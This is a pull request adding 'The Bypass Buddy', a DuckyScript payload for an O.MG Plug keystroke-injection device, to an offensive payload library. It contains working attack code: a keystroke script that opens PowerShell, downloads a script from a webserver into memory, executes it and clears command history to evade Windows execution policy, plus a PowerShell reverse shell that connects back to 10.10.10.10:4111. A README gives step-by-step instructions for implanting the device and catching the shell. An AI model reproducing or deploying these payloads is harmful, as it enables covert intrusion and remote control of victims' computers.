Merge pull request #239 from salt-or-ester/master

The Bypass Buddy

payloads/library/execution/bypass-buddy/README.md

@@ -0,0 +1,64 @@
+# The Bypass Buddy:  Bypass Script Execution Policies
+
+Running user (target) does **not** need to have admin rights. Bypass Buddy has only been tested on the [O.MG Plug Elite](https://hak5.org/products/omg-plug), Windows 11.   It likely works on other [hak5 devices](https://hak5.org/products/) and Windows distributions -- the payload is written in standard DuckyScript™.
+
+## Overview
+
+### Target Has a Strict "Script Execution Policy"?  Evade it and Run Whatever Script You Please!
+
+In this DuckyScript™, we explore a method to evade Windows 11's Script Execution Policy protections.  The approach involves downloading a script to RAM, then executing it in RAM on-the-fly.  This can be accomplished **without** administrative rights.
+
+<p align="center">
+  <img src="img/evasion.png" alt="evasion" height="75%" width="75%"/>
+</p>
+
+## How It Works
+
+To avoid Windows Script Execution policies:
+1. **Upload** your .ps1 script to any webserver.
+2. **Download** the Powershel script to memory on the target host.
+3. **Execute** the Powershell script in RAM dynamically on your target host.  
+*Note: Nothing is ever written to disk.*
+
+## Steps to Execute a Restricted Powershell Payload
+
+1. **Prepare Your Powershell Script (.ps1)**
+   - Create your Powershell script.  The example `reverse-shell.ps1` creates a reverse shell on the target host.  You can create any Powerscript payload you please.
+
+2. **Upload Your Powershell Payload**
+   - Upload your .ps1 script to the serving-directory of your (attacking) webserver.
+
+3. **Set Up Your Listener**
+   - Open a listener on your receiving (attacking) host using Netcat or any listener you please:  
+     ```bash
+     nc -v -p 4111
+     ```
+
+4. **Prepare Your DuckyScript&trade; Payload**
+   - Add `payload.txt` to the 'boot' slot of your O.MG Plug.
+
+5. **Deploy the O.MG Plug**
+   - Implant your O.MG Plug into the target host.
+
+6. **Wait for Connection**
+   - Wait for the target host to connect to your listener.
+
+7. **Verify the Connection**
+   - Type `whoami` into the reverse shell and hit enter.
+
+8. **Success!**
+   - You did it!
+<p></p>
+<p align="center">
+  <img src="img/reverse-shell.png" alt="reverse-shell" height="50%" width="50%"/>
+</p>
+
+## Notes
+
+- **Ensure** to modify both `reverse-shell.ps1` and `payload.txt` with your specific configurations, including the IP address and port of your sending/receiving hosts, if you choose to use `reverse-shell.ps1` as your payload.
+- In cases where you'd like to create your own .ps1 payload, modify just `payload.txt` with your webserver's host/IP and script name.
+- This method is a **proof-of-concept** and should be tested responsibly and legally.
+
+---
+
+*Remember, the purpose of this proof-of-concept is educational and for understanding how RAM injection/execution can be used to bypass certain security measures. Always use these techniques ethically and within the bounds of the law.*

payloads/library/execution/bypass-buddy/img/art.txt

@@ -0,0 +1,9 @@
+▀█████████▄  ▄██   ▄      ▄███████▄    ▄████████    ▄████████    ▄████████      ▀█████████▄  ███    █▄  ████████▄  ████████▄  ▄██   ▄   
+  ███    ███ ███   ██▄   ███    ███   ███    ███   ███    ███   ███    ███        ███    ███ ███    ███ ███   ▀███ ███   ▀███ ███   ██▄ 
+  ███    ███ ███▄▄▄███   ███    ███   ███    ███   ███    █▀    ███    █▀         ███    ███ ███    ███ ███    ███ ███    ███ ███▄▄▄███ 
+ ▄███▄▄▄██▀  ▀▀▀▀▀▀███   ███    ███   ███    ███   ███          ███              ▄███▄▄▄██▀  ███    ███ ███    ███ ███    ███ ▀▀▀▀▀▀███ 
+▀▀███▀▀▀██▄  ▄██   ███ ▀█████████▀  ▀███████████ ▀███████████ ▀███████████      ▀▀███▀▀▀██▄  ███    ███ ███    ███ ███    ███ ▄██   ███ 
+  ███    ██▄ ███   ███   ███          ███    ███          ███          ███        ███    ██▄ ███    ███ ███    ███ ███    ███ ███   ███ 
+  ███    ███ ███   ███   ███          ███    ███    ▄█    ███    ▄█    ███        ███    ███ ███    ███ ███   ▄███ ███   ▄███ ███   ███ 
+▄█████████▀   ▀█████▀   ▄████▀        ███    █▀   ▄████████▀   ▄████████▀       ▄█████████▀  ████████▀  ████████▀  ████████▀   ▀█████▀  
+

payloads/library/execution/bypass-buddy/img/tmp

@@ -0,0 +1 @@
+In this DuckyScript™, we explore a method to evade Windows 11's Script Execution Policy protections.  The approach involves downloading a script to RAM, then executing it in RAM on-the-fly.  This can be accomplished **without** administrative rights.

payloads/library/execution/bypass-buddy/payload.txt

@@ -0,0 +1,41 @@
+REM_BLOCK
+    Title: The Bypass Buddy
+    Author: salt-or-ester | [email protected] | https://gitgud.io/saltorester 
+    Description: Evade Windows Script Execution Policy
+    Target: Windows 11
+    Device: O.MG Plug | https://hak5.org/products/omg-plug
+    Version: 1.1
+    Category: Execution
+
+    Tested on: O.MG Plug Elite, Windows 11
+    Will likely work on other devices and Windows flavors
+
+    The Bypass Buddy implements a method to evade Windows script execution 
+    policy protections.
+
+    The approach involves downloading a Powershell script into memory (not disk), 
+    and running it on-the-fly. 
+
+    This can be accomplished without administrative rights.
+END_REM
+
+REM Formatting is not indented to comply with O.MG Editor/UI
+FUNCTION EVADE_SCRIPT_EXECUTION_POLICY()
+REM Normally I would add this below the header, as it's a constant, but moving it here for portability
+REM Payload to download and run in memory
+DEFINE #PAYLOAD_URL "http://10.10.10.10/payload.ps1"
+GUI r
+REM Let GUI load
+DELAY 2000
+STRINGLN powershell
+REM Let Powershell window open
+DELAY 1000
+STRINGLN Start-Job -ScriptBlock { try { $response = Invoke-WebRequest -Uri #PAYLOAD_URL -ErrorAction Stop; $scriptContent = [System.Text.Encoding]::UTF8.GetString($response.Content); cd ~; Invoke-Expression $scriptContent } catch { Write-Error "Failed to download or execute script: $_" } }
+STRINGLN Clear-History
+STRINGLN clear
+GUI DOWNARROW
+END_FUNCTION
+
+REM Wait for device to be "ready"
+DELAY 3000
+EVADE_SCRIPT_EXECUTION_POLICY()

payloads/library/execution/bypass-buddy/reverse-shell.ps1

@@ -0,0 +1,42 @@
+# Create a TCP client and connect to the specified address and port
+$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10', 4111)
+$stream = $client.GetStream()
+$writer = New-Object System.IO.StreamWriter($stream)
+$reader = New-Object System.IO.StreamReader($stream)
+$writer.AutoFlush = $true
+
+# Continuously listen for commands and execute them
+while ($true) {
+    try {
+        # Read command from the listener
+        $command = $reader.ReadLine()
+
+        # Check if the command is null or empty and continue to next iteration
+        if ([string]::IsNullOrWhiteSpace($command)) {
+            continue
+        }
+
+        # Execute the command and capture the output
+        $output = Invoke-Expression $command 2>&1 | Out-String
+
+        # Send the output back to the listener
+        $writer.WriteLine($output)
+    }
+    catch {
+        # Handle any errors that occur during command execution
+        $errorMessage = $_.Exception.Message
+        $writer.WriteLine("Error: $errorMessage")
+    }
+    finally {
+        # Check if the stream is still open, if not, re-establish the connection
+        if (-not $client.Connected) {
+            $client.Close()
+            Start-Sleep -Seconds 5  # Sleep before trying to reconnect
+            $client = New-Object System.Net.Sockets.TCPClient('10.10.10.10', 4111)
+            $stream = $client.GetStream()
+            $writer = New-Object System.IO.StreamWriter($stream)
+            $reader = New-Object System.IO.StreamReader($stream)
+            $writer.AutoFlush = $true
+        }
+    }
+}